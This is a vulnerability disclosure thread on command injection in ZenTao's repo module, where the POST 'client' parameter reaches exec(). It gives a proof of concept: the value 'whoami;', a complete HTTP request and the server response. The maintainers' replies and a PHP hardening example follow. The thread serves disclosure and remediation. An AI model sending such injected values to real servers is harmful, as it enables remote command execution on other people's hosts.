Command Injection in easysoft/zentaopms
Reported on Feb 7th 2022
Description
Zentaopms is affected by multiple command injection vulnerabilities. The function checkConnection() within /module/repo/model.php concatenates the POST parameter client into a command string that is then executed via the exec() function.
Proof of Concept (git)
1 - Configure ZenTao to use git:
$config->git->client = '/usr/bin/git';
$config->git->repos['pms']['path'] = '/home/user/testgit';
$config->git->repos['pms']['encoding'] = 'utf-8';
2 - As an admin user, go to DevOps --> Repo --> Create and select git.
3 - Insert whoami; as Client Path.
4 - Click Save. The command output will be displayed in the error message:
Connection to the repo failed. Please enter username, password and repo address correctly!
The command is: whoami; tag 2>&1 The error is(127): www-data
sh: 1: tag: not found
Because the injected value is placed where the client binary path belongs, the shell first runs whoami (which prints www-data, the web server user) and then fails to find a command named tag, hence exit status 127.
REQUEST
POST /zentaopms/www/index.php?m=repo&f=create&objectID=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 158
Origin: http://127.0.0.1
Connection: close
Cookie: lang=en; device=desktop; theme=default; tab=devops; zentaosid=vcu28jav9160khhetnp4fjposu; keepLogin=on; za=admin; zp=
product%5B%5D=1&SCM=Git&name=test&path=%2Fhome%2Fuser%2Ftestgit&encoding=utf-8&client=whoami;&account=&password=&encrypt=base64&desc=adfadaf&uid=62018e572ba38
NOTE: the uid parameter is not required for the request to work.
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 07 Feb 2022 22:17:53 GMT
Server: Apache/2.4.51 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: lang=en; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/
Set-Cookie: device=desktop; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/; HttpOnly
Set-Cookie: theme=default; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3600; includeSubDomains
Referrer-Policy: no-referrer-when-downgrade
X-Permitted-Cross-Domain-Policies: master-only
X-Download-Options: noopen
Content-Security-Policy: form-action 'self';connect-src 'self';
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 229
Connection: close
Content-Type: text/html; Language=UTF-8;charset=UTF-8
{"result":"fail","message":{"submit":"Connection to the repo failed. Please enter username, password and repo address correctly!<br \/>The command is: whoami; tag 2>&1\nThe error is(127): www-data<br \/>sh: 1: tag: not found\n"}}
Impact
This vulnerability is capable of executing arbitrary commands remotely on the host, in the context of the web server user (www-data in the PoC above).
This is an administrator feature. We think that if the user has the privilege to add a git repo to ZenTao, he should know what he's doing.
Also, we can't check whether the git command is good or evil, since the git binaries are different for different versions.
The output of the command can help us to support the user. If there is no log output, we don't know what happened.
This is our administrator feature.
We need to exec the git command to gain the web view of the git repo. Since that, we can't keep the git command 100% safe, since it can be a shell wrapper of the raw git binary and can do anything in the shell wrapper. So can you help us with how to keep it safe with the feature kept?
Thanks a lot.
I would like to point out that the same vulnerability (command execution as the admin user) has been validated on ZenTao as reported below. Also, an admin user shouldn't be able to execute arbitrary code on the remote machine.
https://nvd.nist.gov/vuln/detail/CVE-2021-27556
Since the binary path is already defined in the config->git->client variable within the config.php file, you should use that value.
Then you don't need to concatenate the value of the POST parameter client which, as reported above, can lead to remote arbitrary code execution.
Not everyone can set the client via the config file, so we need to support the web setting feature for the common user.
The cron module is also our feature. We can't give up eating for fear of choking.
From what I understood, the integration of ZenTao with git still requires modifications of the file system on the machine where ZenTao is installed.
Also, the documentation states as follows:
Deploy GIT client on the machine installed ZenTao: GIT client refers to command lines built in Git. It is git.exe in Windows and git in Linux. Currently, ZenTao can only integrate Git repos stored on the same machine which installs ZenTao. If it is a remote repo that you want to use, you have to clone that repo and update it regularly.
I would like to highlight that to use the repo module, writing on the file system of the machine where ZenTao is installed is required, otherwise this error will be generated:
For security reasons, the client version needs to be detected. Please write the version to the file /var/www/html/zentaopms/tmp/log/version_62041acfe1d05.log. Execute command: /usr/bin/git --version > /var/www/html/zentaopms/tmp/log/version_62041acfe1d05.log
Since this scenario requires write access in the directory where ZenTao resides, the path of the git binary could be hardcoded in a variable, for example:
$client = '/usr/bin/git';
Then the execution of the affected lines will be safe:
$command = "$client tag 2>&1"; exec($command, $output, $result);
Documentation: https://www.zentao.pm/book/zentaopromanual/free-open-source-project-management-software-svn-git-repo-140.html
Client: the path of a client. In Linux, it might be /usr/bin/svn (for Git, it might be /usr/bin/git). In Windows, you can download sliksvn, which has been integrated into the one-click installation package (for Git, use msysGit), and then specify the path of svn.exe.
(Tips: 1. The client has to be installed on the same server that installed ZenTao; 2. The path of the SVN should not have spaces; 3. If using HTTPS, make sure that it is valid and the IP address should not be right after it.)
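The injection pattern the report describes (the POST parameter client joined into the string that exec() hands to the shell), placed next to the hardened form proposed in the comment above, where the binary path comes only from config.php. This is an added PHP example, not ZenTao's code: the function names, the $config layout, the git/svn whitelist and the checks on the configured binary are assumptions about how such a fix could look, not the project's API.

```php
<?php
// Added example (not ZenTao code): the injection pattern from the report
// next to a hardened variant. Function names, the $config layout and the
// extra checks on the configured binary are assumptions, not ZenTao's API.
declare(strict_types=1);

// Vulnerable shape, as described in the report: the POST parameter lands
// verbatim in the string that exec() passes to /bin/sh -c. With
// $_POST['client'] = 'whoami;' the shell runs whoami, then fails on "tag"
// (exit 127), which is exactly what the PoC's error message shows.
// The command is returned rather than executed so the example runs safely.
function buildVulnerableCommand(string $clientFromRequest): string
{
    $client  = $clientFromRequest;          // e.g. $_POST['client']
    $command = "$client tag 2>&1";
    // exec($command, $output, $result);   // this is the injection point
    return $command;
}

// Hardened shape. The request only chooses *which* SCM; the binary path
// comes from admin-controlled configuration and is checked before use.
function resolveClient(object $config, string $scm): string
{
    $scm = strtolower($scm);
    if (!in_array($scm, ['git', 'svn'], true)) {      // fixed whitelist
        throw new InvalidArgumentException("unsupported SCM: $scm");
    }
    $client = $config->{$scm}->client ?? '';
    if ($client === '' || $client[0] !== '/') {       // POSIX absolute path assumed
        throw new RuntimeException("$scm client path must be absolute");
    }
    // Basename must be the expected binary (git, git.exe, svn, svn.exe), so a
    // stray config value such as /bin/sh is refused. This does not make a
    // malicious wrapper *named* git safe; that is a host-integrity problem.
    if (!preg_match('/^' . $scm . '(\.exe)?$/i', basename($client))) {
        throw new RuntimeException("configured $scm client is not a $scm binary");
    }
    $real = realpath($client);
    if ($real === false || !is_file($real) || !is_executable($real)) {
        throw new RuntimeException("configured $scm client is not an executable file");
    }
    return $real;
}

function buildTagCommand(object $config, string $scm): string
{
    $client = resolveClient($config, $scm);
    // escapeshellarg() single-quotes the value, so even an unusual but
    // legitimate path (spaces, parentheses) reaches sh as one literal word.
    return escapeshellarg($client) . ' tag 2>&1';
}

// Demo on constructed input mirroring the PoC's POST body; not a real request.
$post = ['SCM' => 'Git', 'client' => 'whoami;', 'path' => '/home/user/testgit'];

$config      = new stdClass();
$config->git = new stdClass();
$config->git->client = '/usr/bin/git';      // same value as the PoC's config.php

echo 'vulnerable: ', buildVulnerableCommand($post['client']), PHP_EOL;
try {
    // $post['client'] is never consulted on this path.
    echo 'hardened:   ', buildTagCommand($config, $post['SCM']), PHP_EOL;
} catch (InvalidArgumentException | RuntimeException $e) {
    // e.g. git is not installed at the configured path on this host
    echo 'hardened:   refused (', $e->getMessage(), ')', PHP_EOL;
}
```

Run it with php on a host that has /usr/bin/git and the hardened line contains the quoted configured path; on a host without it the checks refuse rather than fall back to the request value. This closes the HTTP path the report exploits, and the same rule applies to the version-detection command quoted above (/usr/bin/git --version > ...) and to the repo path parameter, which also deserves realpath()/is_dir() checks or escapeshellarg() before it reaches a shell. What it cannot do is vouch for what the configured binary itself does, which is the maintainers' wrapper concern: that file is controlled by whoever administers the host, not by a web user.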
Thank you for your deep study of ZenTao. I confirmed with our guy that we've added a checking step to make sure that the current user has the operation with the system. Thus, what's the version you're testing? Thank you.
And how to mark it as valid again?
Hi, glad to hear that. I tested it on version 16.0.
About marking it valid again, we should ask an admin. @admin
@wwccss @midist0xf - thank you for your patience, and apologies for the slow response time from my side.
I have re-opened the report so that it can be marked as valid. Let me know if either of you has any further questions!
@wwccss could you update the state of the vulnerability? Thanks.
@wwccss is it OK for you if huntr.dev starts the process of requesting a CVE for this report? Thanks.